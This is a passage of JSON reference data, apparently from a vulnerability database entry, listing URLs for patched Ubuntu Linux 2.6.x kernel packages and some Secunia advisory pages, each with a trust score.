        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/cdrom-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-14-ume_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc-smp_2.6.17.1-12.42_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64_2.6.17.1-12.42_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-server_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-rt_2.6.22-14.47_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.33_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-sparc64_2.6.22-14.47_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64-smp_2.6.20-16.33_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-sparc64-smp_2.6.22-14.47_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.42_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.33_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc_2.6.20-16.33_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/27664/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/product/14068/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/27555/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/product/12470/"
      },
      {
        "trust": 0.2,
        "url": "https://psi.secunia.com/?page=changelog"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.2,
        "url": "https://psi.secunia.com/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/product/16251/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc64-smp_2.6.20-16.34_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-386_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.43_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-rt_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.34_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-generic_2.6.22-14.51_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-xen_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-sparc64-di_2.6.22-14.51_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc64-smp_2.6.17.1-12.43_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.51_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-14-powerpc-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-generic-di_2.6.22-14.51_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-386_2.6.20-16.34_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-doc-2.6.20_2.6.20-16.34_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc-smp_2.6.17.1-12.43_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-386_2.6.22-14.51_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-cell-di_2.6.22-14.51_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-14-386-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-14-generic-di_2.6.22-14.51_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-sparc64-di_2.6.20-16.34_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb"
      },
      {
